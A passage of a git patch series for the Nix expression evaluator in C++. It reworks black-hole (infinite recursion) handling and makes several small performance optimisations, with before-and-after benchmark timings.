"«potential infinite recursion»"; + } break; case tLambda: str << ""; @@ -179,15 +189,6 @@ void Value::print(const SymbolTable &symbols, std::ostream &str, case tFloat: str << fpoint; break; - case tBlackhole: - // Although we know for sure that it's going to be an infinite recursion - // when this value is accessed _in the current context_, it's likely - // that the user will misinterpret a simpler «infinite recursion» output - // as a definitive statement about the value, while in fact it may be - // a valid value after `builtins.trace` and perhaps some other steps - // have completed. - str << "«potential infinite recursion»"; - break; default: printError("Nix evaluator internal error: Value::print(): invalid value type %1%", internalType); abort(); @@ -256,8 +257,7 @@ std::string showType(const Value & v) return fmt("the partially applied built-in function '%s'", std::string(getPrimOp(v)->primOp->name)); case tExternal: return v.external->showType(); case tThunk: return "a thunk"; - case tApp: return "a function application"; - case tBlackhole: return "a black hole"; + case tApp: return v.isBlackhole() ? "a black hole" : "a function application"; default: return std::string(showType(v.type())); } @@ -1621,15 +1621,17 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & return; } else { /* We have all the arguments, so call the primop. */ - auto name = vCur.primOp->name; + auto * fn = vCur.primOp; nrPrimOpCalls++; - if (countCalls) primOpCalls[name]++; + // This will count black holes, but that's ok, because unrecoverable errors are rare. + if (countCalls) primOpCalls[fn->name]++; try { - vCur.primOp->fun(*this, vCur.determinePos(noPos), args, vCur); + fn->fun(*this, vCur.determinePos(noPos), args, vCur); } catch (Error & e) { - addErrorTrace(e, pos, "while calling the '%1%' builtin", name); + if (!fn->hideInDiagnostics) + addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); throw; } @@ -1666,18 +1668,20 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & for (size_t i = 0; i < argsLeft; ++i) vArgs[argsDone + i] = args[i]; - auto name = primOp->primOp->name; + auto fn = primOp->primOp; nrPrimOpCalls++; - if (countCalls) primOpCalls[name]++; + // This will count black holes, but that's ok, because unrecoverable errors are rare. + if (countCalls) primOpCalls[fn->name]++; try { // TODO: // 1. Unify this and above code. Heavily redundant. // 2. Create a fake env (arg1, arg2, etc.) and a fake expr (arg1: arg2: etc: builtins.name arg1 arg2 etc) // so the debugger allows to inspect the wrong parameters passed to the builtin. - primOp->primOp->fun(*this, vCur.determinePos(noPos), vArgs, vCur); + fn->fun(*this, vCur.determinePos(noPos), vArgs, vCur); } catch (Error & e) { - addErrorTrace(e, pos, "while calling the '%1%' builtin", name); + if (!fn->hideInDiagnostics) + addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); throw; } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index f3f6d35b9..e5e401ab6 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -77,6 +77,14 @@ struct PrimOp */ std::optional experimentalFeature; + /** + * Whether to hide this primop in diagnostics. + * + * Used to hide the fact that black holes are primop applications from + * stack traces. + */ + bool hideInDiagnostics; + /** * Validity check to be performed by functions that introduce primops, * such as RegisterPrimOp() and Value::mkPrimOp(). diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 020286815..cf6fd1a8d 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -21,6 +21,13 @@ MakeError(TypeError, EvalError); MakeError(UndefinedVarError, Error); MakeError(MissingArgumentError, EvalError); +class InfiniteRecursionError : public EvalError +{ + friend class EvalState; +public: + using EvalError::EvalError; +}; + /** * Position objects. */ diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 89d5492da..d46eccd34 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -4263,6 +4263,29 @@ static RegisterPrimOp primop_splitVersion({ }); +static void prim_blackHoleFn(EvalState & state, const PosIdx pos, Value * * args, Value & v) +{ + state.error("infinite recursion encountered") + .debugThrow(); +} + +static PrimOp primop_blackHole = { + .name = "«blackHole»", + .args = {}, + .fun = prim_blackHoleFn, + .hideInDiagnostics = true, +}; + +static Value makeBlackHole() +{ + Value v; + v.mkPrimOp(&primop_blackHole); + return v; +} + +Value prim_blackHole = makeBlackHole(); + + /************************************************************* * Primop registration *************************************************************/ diff --git a/src/libexpr/primops.hh b/src/libexpr/primops.hh index 45486608f..244eada86 100644 --- a/src/libexpr/primops.hh +++ b/src/libexpr/primops.hh @@ -51,4 +51,10 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu */ void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v); +/** + * Placeholder value for black holes, used to represent black holes as + * applications of this value to the evaluated thunks. + */ +extern Value prim_blackHole; + } diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index 30b3d4934..52cd0f901 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -32,7 +32,6 @@ typedef enum { tThunk, tApp, tLambda, - tBlackhole, tPrimOp, tPrimOpApp, tExternal, @@ -151,7 +150,7 @@ public: // type() == nThunk inline bool isThunk() const { return internalType == tThunk; }; inline bool isApp() const { return internalType == tApp; }; - inline bool isBlackhole() const { return internalType == tBlackhole; }; + inline bool isBlackhole() const; // type() == nFunction inline bool isLambda() const { return internalType == tLambda; }; @@ -248,7 +247,7 @@ public: case tLambda: case tPrimOp: case tPrimOpApp: return nFunction; case tExternal: return nExternal; case tFloat: return nFloat; - case tThunk: case tApp: case tBlackhole: return nThunk; + case tThunk: case tApp: return nThunk; } if (invalidIsThunk) return nThunk; @@ -356,11 +355,7 @@ public: lambda.fun = f; } - inline void mkBlackhole() - { - internalType = tBlackhole; - // Value will be overridden anyways - } + inline void mkBlackhole(); void mkPrimOp(PrimOp * p); @@ -447,6 +442,19 @@ public: }; +extern Value prim_blackHole; + +inline bool Value::isBlackhole() const +{ + return internalType == tApp && app.left == &prim_blackHole; +} + +inline void Value::mkBlackhole() +{ + mkApp(&prim_blackHole, &prim_blackHole); +} + + #if HAVE_BOEHMGC typedef std::vector> ValueVector; typedef std::map, traceable_allocator>> ValueMap; From 74c134914c747b1df6385cab5d2298f66a87b61f Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 09:25:20 +0100 Subject: [PATCH 149/654] compare string values with strcmp string_view()ification calls strlen() first, which we don't need here. --- src/libexpr/eval.cc | 2 +- src/libexpr/primops.cc | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 71c151f96..8e89ddcf1 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2436,7 +2436,7 @@ bool EvalState::eqValues(Value & v1, Value & v2, const PosIdx pos, std::string_v return v1.boolean == v2.boolean; case nString: - return v1.string_view().compare(v2.string_view()) == 0; + return strcmp(v1.c_str(), v2.c_str()) == 0; case nPath: return diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index d46eccd34..b7e903667 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -586,7 +586,7 @@ struct CompareValues case nFloat: return v1->fpoint < v2->fpoint; case nString: - return v1->string_view().compare(v2->string_view()) < 0; + return strcmp(v1->c_str(), v2->c_str()) < 0; case nPath: // Note: we don't take the accessor into account // since it's not obvious how to compare them in a @@ -2401,7 +2401,7 @@ static void prim_attrNames(EvalState & state, const PosIdx pos, Value * * args, (v.listElems()[n++] = state.allocValue())->mkString(state.symbols[i.name]); std::sort(v.listElems(), v.listElems() + n, - [](Value * v1, Value * v2) { return v1->string_view().compare(v2->string_view()) < 0; }); + [](Value * v1, Value * v2) { return strcmp(v1->c_str(), v2->c_str()) < 0; }); } static RegisterPrimOp primop_attrNames({ From cc4038d54177c944340607c7d141680e66ff92a7 Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 09:49:38 +0100 Subject: [PATCH 150/654] use std::tie() for macro-generated operators MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit as written the comparisons generate copies, even though it looks as though they shouldn't. before: Time (mean ± σ): 4.396 s ± 0.002 s [User: 3.894 s, System: 0.501 s] Range (min … max): 4.393 s … 4.399 s 10 runs after: Time (mean ± σ): 4.260 s ± 0.003 s [User: 3.754 s, System: 0.505 s] Range (min … max): 4.257 s … 4.266 s 10 runs --- src/libcmd/built-path.cc | 4 ++-- src/libstore/derived-path.cc | 8 ++------ src/libutil/comparator.hh | 4 ++-- 3 files changed, 6 insertions(+), 10 deletions(-) diff --git a/src/libcmd/built-path.cc b/src/libcmd/built-path.cc index 8e2efc7c3..c5eb93c5d 100644 --- a/src/libcmd/built-path.cc +++ b/src/libcmd/built-path.cc @@ -12,9 +12,9 @@ namespace nix { bool MY_TYPE ::operator COMPARATOR (const MY_TYPE & other) const \ { \ const MY_TYPE* me = this; \ - auto fields1 = std::make_tuple(*me->drvPath, me->FIELD); \ + auto fields1 = std::tie(*me->drvPath, me->FIELD); \ me = &other; \ - auto fields2 = std::make_tuple(*me->drvPath, me->FIELD); \ + auto fields2 = std::tie(*me->drvPath, me->FIELD); \ return fields1 COMPARATOR fields2; \ } #define CMP(CHILD_TYPE, MY_TYPE, FIELD) \ diff --git a/src/libstore/derived-path.cc b/src/libstore/derived-path.cc index 3105dbc93..a7b404321 100644 --- a/src/libstore/derived-path.cc +++ b/src/libstore/derived-path.cc @@ -12,9 +12,9 @@ namespace nix { bool MY_TYPE ::operator COMPARATOR (const MY_TYPE & other) const \ { \ const MY_TYPE* me = this; \ - auto fields1 = std::make_tuple(*me->drvPath, me->FIELD); \ + auto fields1 = std::tie(*me->drvPath, me->FIELD); \ me = &other; \ - auto fields2 = std::make_tuple(*me->drvPath, me->FIELD); \ + auto fields2 = std::tie(*me->drvPath, me->FIELD); \ return fields1 COMPARATOR fields2; \ } #define CMP(CHILD_TYPE, MY_TYPE, FIELD) \ @@ -22,13 +22,9 @@ namespace nix { CMP_ONE(CHILD_TYPE, MY_TYPE, FIELD, !=) \ CMP_ONE(CHILD_TYPE, MY_TYPE, FIELD, <) -#define FIELD_TYPE std::string CMP(SingleDerivedPath, SingleDerivedPathBuilt, output) -#undef FIELD_TYPE -#define FIELD_TYPE OutputsSpec CMP(SingleDerivedPath, DerivedPathBuilt, outputs) -#undef FIELD_TYPE #undef CMP #undef CMP_ONE diff --git a/src/libutil/comparator.hh b/src/libutil/comparator.hh index a4d20a675..cbc2bb4fd 100644 --- a/src/libutil/comparator.hh +++ b/src/libutil/comparator.hh @@ -13,9 +13,9 @@ #define GENERATE_ONE_CMP(PRE, QUAL, COMPARATOR, MY_TYPE, ...) \ PRE bool QUAL operator COMPARATOR(const MY_TYPE & other) const { \ __VA_OPT__(const MY_TYPE * me = this;) \ - auto fields1 = std::make_tuple( __VA_ARGS__ ); \ + auto fields1 = std::tie( __VA_ARGS__ ); \ __VA_OPT__(me = &other;) \ - auto fields2 = std::make_tuple( __VA_ARGS__ ); \ + auto fields2 = std::tie( __VA_ARGS__ ); \ return fields1 COMPARATOR fields2; \ } #define GENERATE_EQUAL(prefix, qualification, my_type, args...) \ From 2e0321912a9efa352160eb1e57e6b7b88e517d0d Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 12:59:51 +0100 Subject: [PATCH 151/654] use aligned flex tables MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ~2% speedup on parsing without eval, less (but still significant) on system eval. having flex generate faster parsers leads to very strange misparses. maybe re2c is worth investigating. before: Time (mean ± σ): 4.260 s ± 0.003 s [User: 3.754 s, System: 0.505 s] Range (min … max): 4.257 s … 4.266 s 10 runs after: Time (mean ± σ): 4.231 s ± 0.004 s [User: 3.725 s, System: 0.504 s] Range (min … max): 4.226 s … 4.240 s 10 runs --- src/libexpr/lexer.l | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index a3a8608d9..9a35dd594 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -1,4 +1,5 @@ %option reentrant bison-bridge bison-locations +%option align %option noyywrap %option never-interactive %option stack From b78e77b34c14b0f127b22e252309527e84967dcc Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 13:00:18 +0100 Subject: [PATCH 152/654] use custom location type in the parser MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ~1% parser speedup from not using TLS indirections, less on system eval. this could have also gone in flex yyextra data, but that's significantly slower for some reason (albeit still faster than thread locals). before: Time (mean ± σ): 4.231 s ± 0.004 s [User: 3.725 s, System: 0.504 s] Range (min … max): 4.226 s … 4.240 s 10 runs after: Time (mean ± σ): 4.224 s ± 0.005 s [User: 3.711 s, System: 0.512 s] Range (min … max): 4.218 s … 4.234 s 10 runs --- src/libexpr/lexer.l | 9 +++------ src/libexpr/parser.y | 25 +++++++++++++++++++++++++ 2 files changed, 28 insertions(+), 6 deletions(-) diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index 9a35dd594..df2cbd06f 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -36,9 +36,6 @@ static inline PosIdx makeCurPos(const YYLTYPE & loc, ParseData * data) #define CUR_POS makeCurPos(*yylloc, data) -// backup to recover from yyless(0) -thread_local YYLTYPE prev_yylloc; - static void initLoc(YYLTYPE * loc) { loc->first_line = loc->last_line = 1; @@ -47,7 +44,7 @@ static void initLoc(YYLTYPE * loc) static void adjustLoc(YYLTYPE * loc, const char * s, size_t len) { - prev_yylloc = *loc; + loc->stash(); loc->first_line = loc->last_line; loc->first_column = loc->last_column; @@ -231,7 +228,7 @@ or { return OR_KW; } {HPATH_START}\$\{ { PUSH_STATE(PATH_START); yyless(0); - *yylloc = prev_yylloc; + yylloc->unstash(); } {PATH_SEG} { @@ -287,7 +284,7 @@ or { return OR_KW; } context (it may be ')', ';', or something of that sort) */ POP_STATE(); yyless(0); - *yylloc = prev_yylloc; + yylloc->unstash(); return PATH_END; } diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 16ad8af2e..b331776f0 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -28,6 +28,31 @@ namespace nix { +#define YYLTYPE ::nix::ParserLocation + struct ParserLocation + { + int first_line, first_column; + int last_line, last_column; + + // backup to recover from yyless(0) + int stashed_first_line, stashed_first_column; + int stashed_last_line, stashed_last_column; + + void stash() { + stashed_first_line = first_line; + stashed_first_column = first_column; + stashed_last_line = last_line; + stashed_last_column = last_column; + } + + void unstash() { + first_line = stashed_first_line; + first_column = stashed_first_column; + last_line = stashed_last_line; + last_column = stashed_last_column; + } + }; + struct ParseData { EvalState & state; From f9aee2f2c41652b3b76d16a874fdded4e6d28d92 Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 10:34:55 +0100 Subject: [PATCH 153/654] don't malloc/memset posix accessor buffer it's relatively small and fits on the stack nicely, and we don't need it initialized either. --- src/libutil/posix-source-accessor.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc index 15ff76e59..5f26fa67b 100644 --- a/src/libutil/posix-source-accessor.cc +++ b/src/libutil/posix-source-accessor.cc @@ -25,7 +25,7 @@ void PosixSourceAccessor::readFile( off_t left = st.st_size; - std::vector buf(64 * 1024); + std::array buf; while (left) { checkInterrupt(); ssize_t rd = read(fd.get(), buf.data(), (size_t) std::min(left, (off_t) buf.size())); From 69ed4aee612e247f2d6ebbb44aba743c4282e00e Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 11 Dec 2023 15:48:24 +0100 Subject: [PATCH 154/654] remove lazy-pos forceValue almost all uses of this are interactive, except for deepSeq. deepSeq is going to be expensive and rare enough to not care much about, and Value::determinePos should usually be cheap enough to not be too much of a burden in any case. --- src/libcmd/installable-flake.cc | 2 +- src/libcmd/repl.cc | 4 ++-- src/libexpr/eval-inline.hh | 10 +--------- src/libexpr/eval.cc | 2 +- src/libexpr/eval.hh | 3 --- src/libexpr/get-drvs.cc | 4 ++-- src/nix-build/nix-build.cc | 2 +- src/nix-env/user-env.cc | 2 +- src/nix-instantiate/nix-instantiate.cc | 2 +- 9 files changed, 10 insertions(+), 21 deletions(-) diff --git a/src/libcmd/installable-flake.cc b/src/libcmd/installable-flake.cc index 2f428cb7e..ddec7537b 100644 --- a/src/libcmd/installable-flake.cc +++ b/src/libcmd/installable-flake.cc @@ -52,7 +52,7 @@ Value * InstallableFlake::getFlakeOutputs(EvalState & state, const flake::Locked auto aOutputs = vFlake->attrs->get(state.symbols.create("outputs")); assert(aOutputs); - state.forceValue(*aOutputs->value, [&]() { return aOutputs->value->determinePos(noPos); }); + state.forceValue(*aOutputs->value, aOutputs->value->determinePos(noPos)); return aOutputs->value; } diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 0986296ad..97d709ff4 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -888,7 +888,7 @@ void NixRepl::evalString(std::string s, Value & v) { Expr * e = parseString(s); e->eval(*state, *env, v); - state->forceValue(v, [&]() { return v.determinePos(noPos); }); + state->forceValue(v, v.determinePos(noPos)); } @@ -907,7 +907,7 @@ std::ostream & NixRepl::printValue(std::ostream & str, Value & v, unsigned int m str.flush(); checkInterrupt(); - state->forceValue(v, [&]() { return v.determinePos(noPos); }); + state->forceValue(v, v.determinePos(noPos)); switch (v.type()) { diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index 9d08f1938..8a9ebb77a 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -81,15 +81,7 @@ Env & EvalState::allocEnv(size_t size) } -[[gnu::always_inline]] void EvalState::forceValue(Value & v, const PosIdx pos) -{ - forceValue(v, [&]() { return pos; }); -} - - -template -void EvalState::forceValue(Value & v, Callable getPos) { if (v.isThunk()) { Env * env = v.thunk.env; @@ -110,7 +102,7 @@ void EvalState::forceValue(Value & v, Callable getPos) // only one black hole can *throw* in any given eval stack so we need not // check whether the position is set already. if (v.isBlackhole()) - e.err.errPos = positions[getPos()]; + e.err.errPos = positions[pos]; throw; } } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 8e89ddcf1..4dc5af97a 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2044,7 +2044,7 @@ void EvalState::forceValueDeep(Value & v) recurse = [&](Value & v) { if (!seen.insert(&v).second) return; - forceValue(v, [&]() { return v.determinePos(noPos); }); + forceValue(v, v.determinePos(noPos)); if (v.type() == nAttrs) { for (auto & i : *v.attrs) diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index e5e401ab6..4c7ea1d98 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -473,9 +473,6 @@ public: */ inline void forceValue(Value & v, const PosIdx pos); - template - inline void forceValue(Value & v, Callable getPos); - /** * Force a value, then recursively force list elements and * attributes. diff --git a/src/libexpr/get-drvs.cc b/src/libexpr/get-drvs.cc index d4e946d81..a6441871c 100644 --- a/src/libexpr/get-drvs.cc +++ b/src/libexpr/get-drvs.cc @@ -198,7 +198,7 @@ StringSet DrvInfo::queryMetaNames() bool DrvInfo::checkMeta(Value & v) { - state->forceValue(v, [&]() { return v.determinePos(noPos); }); + state->forceValue(v, v.determinePos(noPos)); if (v.type() == nList) { for (auto elem : v.listItems()) if (!checkMeta(*elem)) return false; @@ -304,7 +304,7 @@ static bool getDerivation(EvalState & state, Value & v, bool ignoreAssertionFailures) { try { - state.forceValue(v, [&]() { return v.determinePos(noPos); }); + state.forceValue(v, v.determinePos(noPos)); if (!state.isDerivation(v)) return true; /* Remove spurious duplicates (e.g., a set like `rec { x = diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 01da028d8..4465e2f90 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -350,7 +350,7 @@ static void main_nix_build(int argc, char * * argv) takesNixShellAttr(vRoot) ? *autoArgsWithInNixShell : *autoArgs, vRoot ).first); - state->forceValue(v, [&]() { return v.determinePos(noPos); }); + state->forceValue(v, v.determinePos(noPos)); getDerivations( *state, v, diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 34f6bd005..fe5b89b3f 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -128,7 +128,7 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, /* Evaluate it. */ debug("evaluating user environment builder"); - state.forceValue(topLevel, [&]() { return topLevel.determinePos(noPos); }); + state.forceValue(topLevel, topLevel.determinePos(noPos)); NixStringContext context; Attr & aDrvPath(*topLevel.attrs->find(state.sDrvPath)); auto topLevelDrv = state.coerceToStorePath(aDrvPath.pos, *aDrvPath.value, context, ""); diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index 86b9be17d..ab590b3a6 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -40,7 +40,7 @@ void processExpr(EvalState & state, const Strings & attrPaths, for (auto & i : attrPaths) { Value & v(*findAlongAttrPath(state, i, autoArgs, vRoot).first); - state.forceValue(v, [&]() { return v.determinePos(noPos); }); + state.forceValue(v, v.determinePos(noPos)); NixStringContext context; if (evalOnly) { From f9db4de0f3758e0f730a5d98348e7cc40082104a Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 11 Dec 2023 15:54:16 +0100 Subject: [PATCH 155/654] force-inline forceValue MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit forceValue is extremely hot. interestingly adding likeliness annotations to the branches does not seem to make a difference. before: Time (mean ± σ): 4.224 s ± 0.005 s [User: 3.711 s, System: 0.512 s] Range (min … max): 4.218 s … 4.234 s 10 runs after: Time (mean ± σ): 4.140 s ± 0.009 s [User: 3.647 s, System: 0.492 s] Range (min … max): 4.130 s … 4.152 s 10 runs --- src/libexpr/eval-inline.hh | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index 8a9ebb77a..d48871628 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -81,6 +81,7 @@ Env & EvalState::allocEnv(size_t size) } +[[gnu::always_inline]] void EvalState::forceValue(Value & v, const PosIdx pos) { if (v.isThunk()) { From 2b0e95e7aabd075f95cbfb1607330b2284b01918 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 11 Dec 2023 16:23:08 +0100 Subject: [PATCH 156/654] use singleton expr to generate black hole errors this also reduces forceValue code size and removes the need for hideInDiagnostics. coopting thunk forcing like this has the additional benefit of clarifying how these errors can happen in the first place. --- src/libexpr/eval-inline.hh | 14 +++----------- src/libexpr/eval.cc | 35 +++++++++++++++++++++++++++-------- src/libexpr/eval.hh | 10 ++-------- src/libexpr/nixexpr.cc | 2 ++ src/libexpr/nixexpr.hh | 10 ++++++++++ src/libexpr/primops.cc | 23 ----------------------- src/libexpr/primops.hh | 6 ------ src/libexpr/value.hh | 12 +++++++----- 8 files changed, 51 insertions(+), 61 deletions(-) diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index d48871628..52aa75b5f 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -93,20 +93,12 @@ void EvalState::forceValue(Value & v, const PosIdx pos) expr->eval(*this, *env, v); } catch (...) { v.mkThunk(env, expr); + tryFixupBlackHolePos(v, pos); throw; } } - else if (v.isApp()) { - try { - callFunction(*v.app.left, *v.app.right, v, noPos); - } catch (InfiniteRecursionError & e) { - // only one black hole can *throw* in any given eval stack so we need not - // check whether the position is set already. - if (v.isBlackhole()) - e.err.errPos = positions[pos]; - throw; - } - } + else if (v.isApp()) + callFunction(*v.app.left, *v.app.right, v, pos); } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 4dc5af97a..0c35b3713 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -256,8 +256,8 @@ std::string showType(const Value & v) case tPrimOpApp: return fmt("the partially applied built-in function '%s'", std::string(getPrimOp(v)->primOp->name)); case tExternal: return v.external->showType(); - case tThunk: return "a thunk"; - case tApp: return v.isBlackhole() ? "a black hole" : "a function application"; + case tThunk: return v.isBlackhole() ? "a black hole" : "a thunk"; + case tApp: return "a function application"; default: return std::string(showType(v.type())); } @@ -1624,14 +1624,12 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & auto * fn = vCur.primOp; nrPrimOpCalls++; - // This will count black holes, but that's ok, because unrecoverable errors are rare. if (countCalls) primOpCalls[fn->name]++; try { fn->fun(*this, vCur.determinePos(noPos), args, vCur); } catch (Error & e) { - if (!fn->hideInDiagnostics) - addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); + addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); throw; } @@ -1670,7 +1668,6 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & auto fn = primOp->primOp; nrPrimOpCalls++; - // This will count black holes, but that's ok, because unrecoverable errors are rare. if (countCalls) primOpCalls[fn->name]++; try { @@ -1680,8 +1677,7 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & // so the debugger allows to inspect the wrong parameters passed to the builtin. fn->fun(*this, vCur.determinePos(noPos), vArgs, vCur); } catch (Error & e) { - if (!fn->hideInDiagnostics) - addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); + addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); throw; } @@ -2035,6 +2031,29 @@ void ExprPos::eval(EvalState & state, Env & env, Value & v) } +void ExprBlackHole::eval(EvalState & state, Env & env, Value & v) +{ + state.error("infinite recursion encountered") + .debugThrow(); +} + +// always force this to be separate, otherwise forceValue may inline it and take +// a massive perf hit +[[gnu::noinline]] +void EvalState::tryFixupBlackHolePos(Value & v, PosIdx pos) +{ + if (!v.isBlackhole()) + return; + auto e = std::current_exception(); + try { + std::rethrow_exception(e); + } catch (InfiniteRecursionError & e) { + e.err.errPos = positions[pos]; + } catch (...) { + } +} + + void EvalState::forceValueDeep(Value & v) { std::set seen; diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 4c7ea1d98..56bc5e48f 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -77,14 +77,6 @@ struct PrimOp */ std::optional experimentalFeature; - /** - * Whether to hide this primop in diagnostics. - * - * Used to hide the fact that black holes are primop applications from - * stack traces. - */ - bool hideInDiagnostics; - /** * Validity check to be performed by functions that introduce primops, * such as RegisterPrimOp() and Value::mkPrimOp(). @@ -473,6 +465,8 @@ public: */ inline void forceValue(Value & v, const PosIdx pos); + void tryFixupBlackHolePos(Value & v, PosIdx pos); + /** * Force a value, then recursively force list elements and * attributes. diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 22be8e68c..84860b30f 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -9,6 +9,8 @@ namespace nix { +ExprBlackHole eBlackHole; + struct PosAdapter : AbstractPos { Pos::Origin origin; diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index cf6fd1a8d..1e57fec7a 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -462,6 +462,16 @@ struct ExprPos : Expr COMMON_METHODS }; +/* only used to mark thunks as black holes. */ +struct ExprBlackHole : Expr +{ + void show(const SymbolTable & symbols, std::ostream & str) const override {} + void eval(EvalState & state, Env & env, Value & v) override; + void bindVars(EvalState & es, const std::shared_ptr & env) override {} +}; + +extern ExprBlackHole eBlackHole; + /* Static environments are used to map variable names onto (level, displacement) pairs used to obtain the value of the variable at diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index b7e903667..2a71747a0 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -4263,29 +4263,6 @@ static RegisterPrimOp primop_splitVersion({ }); -static void prim_blackHoleFn(EvalState & state, const PosIdx pos, Value * * args, Value & v) -{ - state.error("infinite recursion encountered") - .debugThrow(); -} - -static PrimOp primop_blackHole = { - .name = "«blackHole»", - .args = {}, - .fun = prim_blackHoleFn, - .hideInDiagnostics = true, -}; - -static Value makeBlackHole() -{ - Value v; - v.mkPrimOp(&primop_blackHole); - return v; -} - -Value prim_blackHole = makeBlackHole(); - - /************************************************************* * Primop registration *************************************************************/ diff --git a/src/libexpr/primops.hh b/src/libexpr/primops.hh index 244eada86..45486608f 100644 --- a/src/libexpr/primops.hh +++ b/src/libexpr/primops.hh @@ -51,10 +51,4 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu */ void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v); -/** - * Placeholder value for black holes, used to represent black holes as - * applications of this value to the evaluated thunks. - */ -extern Value prim_blackHole; - } diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index 52cd0f901..d9860e921 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -61,6 +61,7 @@ class Bindings; struct Env; struct Expr; struct ExprLambda; +struct ExprBlackHole; struct PrimOp; class Symbol; class PosIdx; @@ -442,16 +443,17 @@ public: }; -extern Value prim_blackHole; +extern ExprBlackHole eBlackHole; -inline bool Value::isBlackhole() const +bool Value::isBlackhole() const { - return internalType == tApp && app.left == &prim_blackHole; + return internalType == tThunk && thunk.expr == (Expr*) &eBlackHole; } -inline void Value::mkBlackhole() +void Value::mkBlackhole() { - mkApp(&prim_blackHole, &prim_blackHole); + internalType = tThunk; + thunk.expr = (Expr*) &eBlackHole; } From 